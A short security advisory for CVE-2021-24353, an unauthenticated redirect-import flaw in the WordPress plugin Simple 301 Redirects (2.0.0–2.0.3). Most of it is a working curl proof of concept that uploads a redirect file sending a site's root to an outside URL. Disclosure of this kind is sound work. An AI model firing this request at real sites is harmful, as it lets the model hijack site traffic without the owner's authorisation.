Simple 301 Redirects by BetterLinks – 2.0.0 – 2.0.3 – Unauthenticated Redirect Import | CVE 2021-24353

Description

The import_data function of the plugin had no capability or nonce checks making it possible for unauthenticated users to import a set of site redirects.

Proof of Concept

curl -i -s -k -X $'POST' \
    -H $'Host: [URL_HERE]' -H $'Content-Length: 379' -H $'Cache-Control: max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://[URL_HERE]' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHKPMqn9qY39X09NY' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Referer: [URL]/wp-admin/options-general.php?page=301options' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
    --data-binary $'------WebKitFormBoundaryHKPMqn9qY39X09NY\x0d\x0aContent-Disposition: form-data; name=\"upload_file\"; filename=\"simple-301-redirects.2021-04-08 (1).json\"\x0d\x0aContent-Type: application/json\x0d\x0a\x0d\x0a{\"/\":\"https:\\/\\/google.com\"}\x0d\x0a------WebKitFormBoundaryHKPMqn9qY39X09NY\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0aImport File\x0d\x0a------WebKitFormBoundaryHKPMqn9qY39X09NY--\x0d\x0a' \
    $'[URL]/wp-admin/admin-post.php?page=301options&import=true'